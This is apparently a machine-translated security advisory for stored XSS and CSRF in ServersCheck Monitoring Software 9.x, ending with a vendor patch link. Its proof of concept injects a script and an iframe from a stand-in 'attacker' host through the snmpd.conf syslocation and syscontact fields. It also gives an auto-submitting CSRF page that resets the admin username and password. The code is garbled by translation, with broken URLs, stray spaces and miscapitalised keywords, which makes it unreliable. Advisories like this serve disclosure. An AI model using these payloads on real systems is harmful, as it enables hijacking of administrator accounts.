Release date:
Updated on:
Affected Systems:
ServersCheck Monitoring Software 9.x
Description:
--------------------------------------------------------------------------------
ServersCheck Monitoring Software is a network Monitoring and server Monitoring Software.
ServersCheck Monitoring Software has a security vulnerability. If the input passed through the "syslocation" and "syscontact" parameters is not properly filtered, it is displayed to the user. Attackers can insert arbitrary HTML and script code.
<* Source: loneferret
Link: http://secunia.com/advisories/50959/
Http://www.exploit-db.com/exploits/21866/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
# PoC:
# Store XSS & Cross Site Request Forgery
# The XSS is triggered by inserting ing a snmpd. conf file to point to an attacker-controlled
# JavaScript file.
#..
# Syslocation <script src = "http: // attacker/xss. js"> </script>
# Syscontact <iframe src = "http: // attacker/scheck-csrf.html"> </iframe>
# CSRF PoC:
# We can also use the previous XSS to trigger this. Makes for a funny.
# Change Admin credentials
# File scheck-csrf.html
<Html>
<Body onload = "trigger ()">
<Script>
Function trigger (){
Document. getElementById ('bad _ form'). submit ();
}
</Script>
<Form id = "bad_form" method = "post" action = "http: // target: 1272/settings2.html">
<Input name = "systemsetting" value = "secure" type = "hidden">
<Input name = "setting" value = "SECURE" type = "hidden">
<Input value = "OK" name = "changedsettings" type = "hidden">
<Input name = "systemsetting" value = "SECURE" type = "hidden">
<Input name = "XYXadminuser" size = "30" value = "loneferret" type = "hidden"> <br>
<Input name = "adminpass" size = "30" value = "123456" type = "hidden"> <br>
</Form>
</Body>
</Html>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
ServersCheck Monitoring Software
--------------------------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
Http://www.serverscheck.dk/monitoring_software/release.asp